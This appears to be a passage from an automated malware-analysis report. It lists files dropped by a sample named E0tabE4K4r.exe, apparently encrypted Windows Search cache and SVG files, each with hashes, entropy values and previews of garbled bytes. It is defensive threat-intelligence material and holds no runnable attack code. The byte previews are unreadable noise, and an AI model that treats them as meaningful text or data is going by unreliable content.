                                                                                                                                                  Preview:[{"SyULkiS..].G.+5..{Q|.0m.o.a(v~[.{..IHY...y..;...R.2....y'..u7U..N...;..0....'..c.i....o................)1.Y.^x.r....]......!V###9.%.dgYr.D....6v...uY..%F.>q.v#....A......S...z...P.z.......sO/{C....1.....^e+.K..P...~....-.X....S}..6..*...H...LU5.h...X.h..4.p*....-L.T.&..s{o)JD.%?..'.o}.N..$.X.%...*y..p..PF=.x}..")...`...^w.g.a...mP~.U.."S......#7.C....z.Y..S.dA&.....Y....q.Z'.nd.w...X)..l....>.)..z.)QR9.....&H...!.uVYyi..W..G..Z./..N-d.+.....a$/q:.....t...3..l...0a?_7 +?...uO.v......,...2c....qi.Z{..W..............Q......E....{..$.u..E..d'd....i.z..i....g....Di.e.p&S...@Q....>9T.i..wG.../....P4.^.`...Gp.....}.]...1u+#kH&.?N.l..)..<.j.GL..X.TRH....tM5.\.|.,q.....qf..._.i.=n.....w:q\4p.g..,...9y..F.$}.......}....Pc^.[....G.%=.oMz...{6.x...Z(.......;..4....].@).l.VtHI-SH.D..[...k...%.H.CijY).{7........B%...0.g.Cw..PN.j..A.M.X.....P*n.{V...tP.@....u.......Z...(E..(.s.mf.a........t9..z..'..9..Qh..{......w......7..7:\.j.5..|...-..wn.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409774968816083.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):117430
                                                                                                                                                  Entropy (8bit):7.998285421327965
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:9CdH4o0InKykyGGF43TTmDmsDPxz6MoNtpXMuPeUDr2/vyD4YfOMaVTg9O/YyDN+:AcInKykybqDWF47XE04YOq0Yyz4
                                                                                                                                                  MD5:A2F9CBDD6B85022944DC63E84347A680
                                                                                                                                                  SHA1:32D4614C055F77FA2C2EDA6BBF922852ECD6A8B9
                                                                                                                                                  SHA-256:8540841C5E3E26860C6FA262814A1606253DCE1FB995C2B683CB211E387FDF7C
                                                                                                                                                  SHA-512:0F9FA4C50D6D66E79555F00E3F2B9703CCD1D5B05782B95248127D660E5FCBED638A8B339E1C1A110F91E3D42BE8CFC15245256E55768023ABE4565C65FE8062
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"Sy1]?."Z2gU...06...m.H.Q..T...F....v.%....]....U.p..o.j.Y..{.x...D.....s..z..VJ.......I.g@....mjcZ}.z...8.s,..B.....K_:......r.R.u.....-...........|.......X..$..S....O..ox....>B.d.9^..i.kQ..:.......5...7Vy&C.w..p....):.s''W=2..gJ~rP..z-.O......7o.....T..N..'S..2.E..}.)j...jX[.....E{Z.....J....m3&.7'6_na.q.?.J..=c.F..3T\R.3o<S..K....*:....'..+..jOcle-.......-.8.O....I)...$..y..JJ...Gn.)... .ms:.jr.C..z].....P..Dm..K...T..V..&]d]..5M...R....^.M..w..8....'Z.$owS.6.u(t.....H`: ...fy..}J,r..qT...p..(......ye.Q730s/......RNow1.u...~..C.kW.o.4..L..H.._3...*J..m......n..%......c{..!.e...-.4.K....&S........*!.y.80..Be...S....#..MM....fcI....s.z.B0HM.shJ'c"E...lk....._.&.69k....oB...u!..w.......S.......l;A.C..r"...=..CC..>...3.E....)<.............M65..NrL..:$.;)%...o4l.q.(HoR...`.!U9.y.p....#..f...>.+Z.k..l./2.W..M.N&..........;.IP-#..J.J*DW....S.8..e.eEq 7.{....eU#...@"I...\.R.Rx.4n..,.8J..{HN.3..v.....e..|......?b..TX..X...pT.z.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409775200518165.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):115972
                                                                                                                                                  Entropy (8bit):7.9984006035938
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:LV0THqXW5n1DxVgS8YeClvVkUHW2DDlA/ioSu1R:LV055lxVfTxCQbBA/ioz1R
                                                                                                                                                  MD5:F0573A5105CC339FCC4F349A61602050
                                                                                                                                                  SHA1:2C003E3778959514C375D95192804D3FEFEA8CEE
                                                                                                                                                  SHA-256:FD62DF8D5AE6FAE2EE0E7253B6CB5D438FF17ED170F891FA496FA18987FE60BE
                                                                                                                                                  SHA-512:126EEEECE1C2A2744484411892A9FD072C59AC75D4D82D6BF5D7475923D1C3BDB2EEE8363283A935B5AA69760C83B9D38633FF29D2F39539DD2C8D86F61B882E
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"Sy.....iv.=.....ow...u..,l.|x.<.T...H..y....9&c.XP....:..,.a.__...Y...../j...{....}f..:.6.....Y...<9\...7...Q.w...].|.P..n`....C.W.h.3.K.on).5U.y{...8...!.K...2.).V..*....d...._.....?:.iAy....VU]B0I.2i.s...!...?....d./.g.K.b.)c.~....-U#U....L-..e..i Z......r.<.Rm#*...K"q...&e.....2?.. #.9.;.uG?.._.g....EbS.K`...Hv.=..W...y..<U.a...p.._.......l.).>.#....k.C.tk.\...Wj.a...{...;.;q.I!e.E.OC..@.~.q.J7.S...>...:.[... .z.Y"..OF....<.H.`.$N"..n.%.....>{....T....1......B*...U/.|..N\. ULG......^!<....D./.R..C..J..)..8F..%.a...xu.?51........7^N)..7..-.0..*..;.yHQ.~.3...j..H...[.-.p7.....1.../..ic..L..6...U...e.......Wv.....(.0.1W@.....k.!.x.O.{Q......s.G......Q!$[...5...P.G..B.....C...?A..^O-B........u...c......1..l...U.N..x.f......v......h.PL.M.A{..E.B...*=..w....D]4..$.~':...M....}...erf.....H.Xw.RY..5Y...dE.#P....86.+.ZT../!....t.......w....._c..e.....Jn...!9.2(..R.k.....\.@X....hr..b....._..r.y..I.t&.....i...x...?eJ...zbB....mu..;z'....q

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409775339876828.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):115972
                                                                                                                                                  Entropy (8bit):7.998353574198236
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:Mtxt6qe5FYo9zB7qrxhCdfMik/zCRm1fQSm:MtmHy0zB7qrxMdTrYfQSm
                                                                                                                                                  MD5:9A990378614E18EA8D293A0D392C382D
                                                                                                                                                  SHA1:FE89EAC03AB028D9846CE573965BD726C2223E5D
                                                                                                                                                  SHA-256:AFDAC4331794D0C60CEA803E7C2F128A32F0068A5087A1F2C419927294716B9D
                                                                                                                                                  SHA-512:168F4544CF34699E2D243CE482D651F720604CA429135B6A22086A72B1D69853E6F390F9ABCEF93F042AB46927C78F43D4E8984744D36C5EFCD7E3629CFF7155
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"Sy.X2&I.....RG[.......+7....i..i*.f..~..e..p..F./....;xa.....3..gz..OR.$Z-)>5....^...K.M\o..W...t.Ow9,;...~..^....n.*.B...s...+.M.s7..r..Q.....-.....|.........pw(Sh...>]..W...........W...|..Q..|.<...3T..w]Ya..nB.I....0....o..q.g.ho..B?...@..*.D.........g...d.0e....p(...y.0.<N....qC.+5...iHP.#...+.<..Xn...^*...........`>-..h.d...f<m......<.}..".w.9.m,......-.zKC-C.g.?.N.w.T..q...s.......:.xj..5.)......R[D...l.......(.>.?'p._R4......YrP.:.....{.p...0..8.......V...V^._..d.......!......[..(.01.5B..:....Y1Y..|P.d..`?a....q...k..~%.K..~.].."|T1....e...k9I.U.c..."...F!.*./...."..M.....g>Rt.....fh.4X._a....X.5.)...ssXA..............@0.."....L..j.wj..K.dZ66.y.g`Z....z..O.v.}...dQqi_....s.R.\.s.,...K...K...r...:.6K..#8.@....Q......^.kT?..-.x_...g..`..j..*W...U..'.....d.q......}.....U7h.jqfm:..b)Q...P<S...S5.VV.../.B..H..!.T..K..t.*.....5.....:...>o0...D...L>.'.....&IX`Kd.*+....p@.........zv......*1.Z..K..'.z}.[q.g..HP.n.fh....<.(.=.?.......3.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409775861676833.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):115972
                                                                                                                                                  Entropy (8bit):7.998604620839232
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:5lBXO6jXEql09FEI+hiC50Bidsg+DWMgOBL21rh8:5lBX9zEFEI+oQ+6MgOlGi
                                                                                                                                                  MD5:41D8F3B66F9D88026D80B32C4341CD84
                                                                                                                                                  SHA1:A8D69032E6F94F566470A67CE1E782CAD4C86381
                                                                                                                                                  SHA-256:D24977F444BAED8974323E95831EB1D72B23DB911778E5E675EF28032F795B42
                                                                                                                                                  SHA-512:48335E2250AB46D1FD4C7A9C634B7F1B1529906B072F6FF0C7D54F75E78936065AFDB2A73007C2DB3CA310D6DFA7AE3497775933E1AAAD8E8A81006339061561
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"Sy7...k.d..4"...D...YZ4.YQ..{.C..Z~Le..r..d<.d.qX?QB./i=.u*..I;.K.47.V ..*.h.8y: ....ym..........q....[.s,.O...x`.?@.........q..T.@.f.}..AeO....8..dK.....u..=#U2D.G1"3.q/:/44t..f..i..<(i.\..u.s...,.?}.8o..y...*.kB%......F*!....#,.+xx2....S...h.g...........c.R,3..Oo..t.{:.%.....Ek..J..y......^m..0...*k....z.J.#I...T1.Y.o..S.In.Js.......1.1.v..v.&..i..b_...P....1..K9..Ji...|w.A>..).....=..d'....|.....]..JZ.T...x02o..].....k.1Ov.C.8:....PqrT.;/.:W..r+X.D. ....P...qk.M...f.D....r...?(Nas.{C.xh3:..6..-9.!X.Y.j.t...c....5..[.s.!.TbN.w....L[..$.|....4M.F..p&.IC..7..q.....W.i....'.~vc'N.F..X.,...J.z.+.E.l$x...6...r.......E..C.....VL...iTr.3."d.>3...v...ldJ.1...gB<.)\9g. ..v..8..m.._}...U.oY.2.)r..Q...q_...i.l.U..Z.....:VJ)0Cp..1.. ".D....).s..mE.........7.~ky%~3..u(..^..zf....t..z..C.]\..J.g8..eeL......r...l.9.>.f....v....^.^.%.N8.9(@...ty..L....E...%.......\ l.,..:*(}.]mV.Up..x.........xW.~M.M..8...........uS.0.*.6...?M..a.T...J..c....;.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409775915610935.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):115026
                                                                                                                                                  Entropy (8bit):7.998470467532633
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:tMbo1MeuLijC9GbX7cz5bOa+t1qd3GNVtVRxfMBJ:tMWMBLgy2X7cz5yodGNX7On
                                                                                                                                                  MD5:34F740A6617CD278D7DF9CA0FE35624D
                                                                                                                                                  SHA1:05AF9BBEA9965B5BCDDC004215F9FB4F195478EB
                                                                                                                                                  SHA-256:7266B2CFA6F13EE1687D44A51A281583C9A928949FD626B966B52EE7155465F8
                                                                                                                                                  SHA-512:B8DB1E472B6C57582062B4F219ABBC267F63C4D11FFCA117D48A17EEB3583F1FDDF64A890524051227B020DD1A2988911C287EEA40905BCEC24B6FE2CA216A20
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"Sy..~A/O..b.....KVI.....-pGv.-|.F..>.p......\....Z..X.^.i7.).8.L......\..........[._C...V<..$. .I..X..Y...;........4v...-.......Z(..).O\.G.!.....z.../..AR.F.8..yw%..R(.G......T...~.,bD....9.....q..5..........a.EHP..f......v..)...8...*.....]`<.. ....s.|>.V#.)..yT..I..4..7.....*.{.u..._.S..0...........=...&u......@..Q.5S.-.a..f'E...X(j.9.._...^....jA.Y\\`.*...N.@.M.)C......8Oj..".%....d._!JLf...1..B.6W.\;.Y..,..*..X{.].~..$h..A.R....vTNe.tBs.4w2.7.{...|1...;..._.s.JNms*.8YN....../...B...$Z7..v.{..>:.0s?.>.9..y.ski....l..3...bL.^...$.zs.a..<:..L...&3...Z;..p.....+.O6..0.Z.&98.n..........L.m...4m...E.....!.E..5.._7%.q*.1.|.C..Z~....rkzfk....S.].K.[!..b...&9....:......+]/]..E.3.C..'6.0.."y%.f.X.[.^..w..... ..S...z.......G. ..d..`.:.....[.y..-.(..._7W...oT.c0......M..d....#!B...}.t....>.C1M....;....z..v{...... .R.+...s..=..@!...|.i.W.....D....V..:$.O..>.BYh..PV..A...RRS5.W.W........=..S.-.A...9...c..q./..(..T..............

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409776161022105.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):115153
                                                                                                                                                  Entropy (8bit):7.998477289148708
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:GlHa/HWimtNDM46o5JEqxSkuV7026p4h4nLP:yavWztNDl6o5JEqxeR02th4LP
                                                                                                                                                  MD5:14E3C9B3C235FB387D390D0C0142D9E9
                                                                                                                                                  SHA1:233965BA6CDA112E6BE40D0F5B43DAF1F4BEB2E8
                                                                                                                                                  SHA-256:B8E4010A001869E2BF5C6A2783525C2575DFF20F8956A596DDD9749DD45467B2
                                                                                                                                                  SHA-512:EC7D02A680F31A6AAC7BF31FA120D2E98CE27E56D2EB9C86E16C3E1CA28F094A3197C506540885883A743C8F6F195000748DAD805510163968A9B6D6E4585796
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"Sy7...ZH.....M2]...E.........B...1....,.j r..z.....VZ\.:.d....=f"...DDm..+.,e..aN...r.....K..8bv.C.Xf...Z..4E..\.c?.u.s. ..}...'..?.`.s..}.3..Q)P.......:."c.~.lhd&..,.m>...`Muv...9..B..e.....g...r.VTX..w..J.1..s.zx?...V..{..{...F....5..%{.....s.I..t;..I.....<|...k..:.,p.Y2.-.4*..........^7..........."I..U._...[..r...d.Sx..,.x....iK....n..]......l..72Ab....J.<.....(.".8.iF'......)..?\N= b#....8d.X.U.}.qGg.}.k!7e ^....5.......Sy..E.,f..4.....G..P0..77..`.[.u.$.{F.M.4$m..._.p.*.....7Uu..fTi..Eu.!..P8.... .....8..7.......*.]..q.W+gu..D5...s.I.Jt.uTp...i./b....^M...#Rl4...K.F.3..}.....Qpi...]..f.. A.?..`-..N?....*...pt]<&.....[m.iiJh.a.|.^..\W...Ot.....D..j.9.........K}..<*~"..:.._...Yt9..I.........5U......2.J..K..+>.......{.......h...U..`.e.RA+.....D.\...q.GP.)...A>..CR@V.6B.. ..eK*.$..U........$C..3.ldQ....qQU....g..7.\I....6......W`'.PI.JHWLl=.{W...n..ZWY..o..Rg.Q.....yK..E.....3....6........;..R.Y.P...n.h.p.c..G3|.8....4

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409776607416451.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):115153
                                                                                                                                                  Entropy (8bit):7.998230860224625
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:nYfYgwg85XJP5KtMxEnS3LyZa+szBTS2XhhwiseWdpJxQsi6N:nWYgsXJPstM+nS33HdzPxcN
                                                                                                                                                  MD5:0FAEC5C72376E428D91D98EC0C34BAAC
                                                                                                                                                  SHA1:664F5122F47CA8D4DCBE60A9D1AEE34857FE91CE
                                                                                                                                                  SHA-256:26EF73B5A32690E18DBADBC4BEB83AD9D18D928984E995DB5DE13BDBEB5C5E18
                                                                                                                                                  SHA-512:429B4B0287D31DA39D0344EF78D577439ECF4C9AF62FCBF4DFE904520D00AEACE6DAD769A997D46C62151A41CD8E5E4F5B28A3DC746323B90C8D844E4DC87FA6
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"Sy')o..e.*.I....K......V9......QI...P`..>.y..g~........k...,..T..xJo.^K.Us%.G`...@.3*..XV.w.$.y./"I._..Ax...R...[.&."......+...NPzS1%......`.g....{WsA'...+Nw...A....VpTb.B.......rs.l..n~.3..\....pOU.w.D...7..d.I..<.\...N..._vF.CES.F.Ir....U.]mE...z.*.......zO.ds...09.y..AJ........WZ...#d........... De.A.0.,....i.E\..{".I.#....\>g.=0.....M...&V.....4..H..a...6..+..K.g.{.dH.....=..3.!..bX.J\. ;...L..Y...Pd.$&d.6#.57.`.8....~.....wg.u..jVd3.c..f..../Ib1.......A._]|.(.`S.d...|s.,>+... ..#Y.[.....:.s.8`.....^......oGt.oML...:....Dk.~.....-..(q.6....-...~..`..]..n....Z...S./P.~..`.4..N....!..f ..h.S..<7...........t...e>Acx..}...W.c.=`.E3..n..$n.2J.m..].<.A...g^rL...Hy.F..#.P.Z.6.>ka.B.....m<.k9t.%..k...L&Z.U...XV..I...........T.T.....L.z.4x..7zgN0*.......K$...@Z<.Ay.&}Y.H+W(.H......^...C.].^w...1.j;........9.z.^....(....9.|..~[y....:GM.....7..mQ(>r.7..E......U~;P.Q.`..._UIfn=.'.zQS&|.s-.,LC...'.E@.X.]....P..%<.-.y.p|..............sd.=..%..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133494500820629104.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):114311
                                                                                                                                                  Entropy (8bit):7.998229141775095
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:JlMCjRY28Ato+Nzyk4AuFDq3gUYNrVydorNf62CoVqFnj2lFdobPAdmgUlCoa4NA:JDYEo+Nzyk4AgqeNZCtoV2jNbdMovNIr
                                                                                                                                                  MD5:2FE7A26E4D74F7E25978D46A5F530DCF
                                                                                                                                                  SHA1:B196DD2F1A3AFF628F976A750B8E835F6633B495
                                                                                                                                                  SHA-256:F959BCF5429F31655D9DD23F755D77F9F29A29F298198222F369DB620D121D2A
                                                                                                                                                  SHA-512:699ACE3C674023E131739F892069A4356BBB2F41C8EC7FE5FB98AA8BD30882D8173F07A53F6061F82F29C73790C5425397D515101EA37DB9982A8432B6E13D4C
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"SyTq...oi....-.]..}Zd.N.fi..1.|.)..gq.T.\>........+.V....w..7.....!-.$]...7M.A.n..f...8....w.......h.J..G@8..0h.......^M.J"l6.5.B........x.{bU..c6.y_..@...%;n..,..I.A..>{e].W.x.I.O.#3....Z....Z.M.)....>.v..3.\......"...I@m1..Z.iR.$.....H-.].y.N#..~...0W N\f.......J....x..&.h>KAXnL)zH.X.....~.J.)...!#S..A..B.+N.s...9I..S.P..`...kPe.$.iM...J..MA8a.....Q68.>kr..xtj....|....L.#?+.).[]&..v...,..4.<..s.2..H;.!eK..I.zn.m.@..............S..1|.j?.2.Y...`.D.5O..#`d..24....y.-... ....j..g....Z1&6.?...a-<......>.<..FE._....8,LG..K.Q.W......._...vF.....s`....2......\.%.V..R...P....N..k..?.^.C..:<Ji.Tx}..c..=.XO.K.Y.<9..*...d<.L..P..&Z..s...1.D:....pWr..n.....X^r.6.Y..G..E|......../^.}x.:U.B.c.TU.>...z.C.!L$..........'D...........N..go>..V.6$........iHpV..[..'{A.C.:....t.hEPj.%.A[.'.4..M...Q=....b...j.2..?.^(...8|t.......v.!.@u.&.s.s.i.J^.....b.x..p.&..ggd.X......<.<5.i.gJ.5..[9H=*:Zn..w}!FQ/.g./..|V....Y....Y.2..l(M....zXyu-|..f..k.;...kg....

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133494501122004824.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):114311
                                                                                                                                                  Entropy (8bit):7.998480595589447
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:FZKg15qgSh2J4qfHzv4M6T/TBldp923vQHlYKDBkmvo:FH15Qh2JNfHzQL5cQO48
                                                                                                                                                  MD5:EB46C4441DB83D0CACA9C911CA9831D0
                                                                                                                                                  SHA1:0E8577716E6BC3AD229BC9F8B61F9043432754C1
                                                                                                                                                  SHA-256:BD9CABE08A83364B5DF1047C4A217848B165B8D17548D0D548AC4D9D94D1DA23
                                                                                                                                                  SHA-512:0FDD8148244A6BEBB2CD48045DD0A13929105B7DBBB7648B12666C361BD25DF08F6F069E1B7BE68B8E0F88DA655DAC8FDA91C81514BD769513A9DEB08D98D34F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"Syz^..U.]....@....tJ.....h..N?..!.@-...C....S*.!9.h.Kt.d..I%...j.W3..H...als..SX...'.......@k..........5.J..8.....(9..<UN5...R..}..,...M.!Q..x.9...g../8..5.6C..h>.@.$.A.KF...9....@........LCy_ .]k.P!....N..V8...R%exR.......R}.\.U.6.....L_L.a...v...P...z.(io.r....k#G}.ll0.j.y9L....l.W.j....Q..[.....8...c..0.E...."....|.WRc+.o(.C.WUk...J....n.(n).O.z.c..w7..wl...U!......m...!o...^c...H=..G...8.=.......{..W_.N.8.3e0.O...-.l."......Us}.O>..%.%..........F.dR.\..A.H#...........U.F(.H.W..ESF.D@2el.3}.....h.q.|s...n.T......T...%I...kg..D2....0..b..-.P..3......!.ew..S<....}*........JL..e......\....e.u.).m.~..j....7..<.&..r.....&;.......T".4 .J.i;.&}....h.M..F..&.....|k..X.hw_.0F..?.K-...:.....k.~.{.... ......S...!.[....~.M3..y...*.sn.f...9F....Cb.0.s....V.s...]`..F.r...X.....*OGff.....G.UC..x.....%.".$.....L....A... ~T....]..]:-P$..(...+..}.....,g](o2.....X..._.r..._.g..w.....'..o...#,`.2.E..5+.8b.!.k....@k......Ig.7U.@..V...9..z..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):696930
                                                                                                                                                  Entropy (8bit):6.2092219029742255
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:MqFRSC8nZVoioGotdYuMOCc5MpzgroTDLga:VnStL1uMOCc5MpzgroTDLj
                                                                                                                                                  MD5:30EDB206A7B512CAE8B74C7FD0A106DE
                                                                                                                                                  SHA1:234409F9E738A71901C6D179753607743D4D505E
                                                                                                                                                  SHA-256:D7E1D21C34E5DEA9618FF7C856BBD2AFCCF841BF457D613BEDA108C97B849FD1
                                                                                                                                                  SHA-512:C05FA0993036AE2CEC492C325137BE2E0448EF751F0FDD30578EC955C2304A68530EAE7EC75864247FE0E8F470447AB908F4B8B106B6550E57CE5C2AA6BE88A8
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"Sy..t..u..K..`N.7Z.T.......}f.A..>1@..v...oM8v#....b.`$b....6..I.C...(.|)j..3..nD.XP.#..6....L......7...H........C..C`..>.....-<..f.xs@3..A<.!L..z...jV.G...|h.(...<.k....vHZ..V...GB..."Ff....V&.(.....f.].!D.B.*hJ/.K.d].K.""......&@..X.....7..l7..P-..:..].U,@.<.-`Tg.T,.G......o..]..d../.h-..+.5Y.8x.......m..(.....I..};.nQ..|.H.e..1..........il...V...d.j..D.H..Tz....7g..}(. .m...y.y....\I?E.....G.=.WI.X...n.12.*pdN.F...f'./.....Bm....P...u.`.-...^.+...P....S.\.....k..]....6.?........*q.df.MN.5>^..e.@y(...t;.R.I.GH..>.+F......C!.i,......,....Zm/r./..~]l......u..K..................|.!..R...U.\.>=Fc%..)\.xW.oI.....V.}..*.]t..URo.c.3D.....s/.........V..0.j...!F........3..G...@G...eQi)[*......].^.Kt.x.F%...F.....).`....U..64....`pq`..B.....TR}c..H......zf'..T.>.....e./n......<.%....Fh...{..%..z.].Jal.+0.ejk., .0..f.........Rs....^....~R.......!...Qu.J...|...S...r.>...!...U......:j.<>..<.e...?......+X...C..O.....7..x..dw...W.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):28781
                                                                                                                                                  Entropy (8bit):7.993760938365702
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:R0CD6lA9Sna4lbXsleU6cIpjglZnWJcV/T:R0XA98TlbX0eUPWglZAcd
                                                                                                                                                  MD5:7127ACF579FBC1868C4D37EF75CCB091
                                                                                                                                                  SHA1:61F7675868FA5F7E45C64F2928B66470DE803B88
                                                                                                                                                  SHA-256:FD762DF47F1EDD0690CA4B788D98DA3E97037C7483DFE23332316CBD5DFDBF66
                                                                                                                                                  SHA-512:23F3977E290FD687C966623FDABEF365B1CCB09AB846D41CB2BE8D4EE538506E46B17EE01F480079678B2566222B2E13A2733CC6C3DF1FFD538165CF45F57AF4
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:<svg ....K.......$~.Y..F~..ls[(L...)f...<..AJA.9^..-....4.\0B..F[pJ..ib..QN..|.k.`BU.... X.px.".'.3.........bg\../y...l`.k."/3).....E.O.W...s.`..1. 4...d...0.y.6.........cfw..%)../...........u.v.~.1......_...|@F..b(....\.6.hU......`.B5.>..Z..H.Y.eo`OgC.O....{..P0....4|/.HD....[....n..9...Gk......g4.V.....9.T.W..!t...@.e....aa.F?f..]...p...........fFu..H.....2.i....t'.N).F.O....@.......$U.>$.49....\.....{l:.0....(..$:X..eW'(.>?...$.Qy.e.{..Qr..k.(. /F.L..5.......A.f.j....r..y..K....D...W...:t.l.0.h.~W....fyX....lg.O.J.3....../n'.9y...`d..Iq....8....1Q.T.S^e.....>...CLrvq..'.-..+&.q.b.S\...0&"'..u...87/=..s#.e.).....;..)..=Q.E...;...^[S.q....s.......Mp...@T.u.Y.N.0C..>...Q..*l.+G..46..)..._Nv....~L\.7..h+_...'.IE.A.d..#...J...Q.^l...P..;U....{.W.P-.C.....o'.!v..\..'..u.l...>.k.L.J...},.%Q...T...........W.....6..T...(.-...2......O_%.....%}..l. ..o....O.z...%...g.!.nS=..l.t!.-.f..n=Q.....5.7nQnn..9..'{..fl..Z..Fp..?..~.V.N.M.j...,

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-LIGHT.svg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):28813
                                                                                                                                                  Entropy (8bit):7.993905727207145
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:sblAvnHYQ6WVkilJ1PzdhufnmWbQlIqsJ:sbEKilJ1kmH2qu
                                                                                                                                                  MD5:69FA0669AB2E212DA0726A23E73277D9
                                                                                                                                                  SHA1:C68C926A0EE246CA3124532964941234E215D7C6
                                                                                                                                                  SHA-256:7942658B9FF9CEF79241A9E734FD08F6A31D75DFE4066F3F223A807618ADDCB4
                                                                                                                                                  SHA-512:606E9EF53178BBE03F619AEDD6F2C10B3879B22D2ED0AA7C91458947F47E9371B282CAED03C0BFF9CC5945BC3849067E9BE317643233180D8375F97F4918F798
                                                                                                                                                  Malicious:true
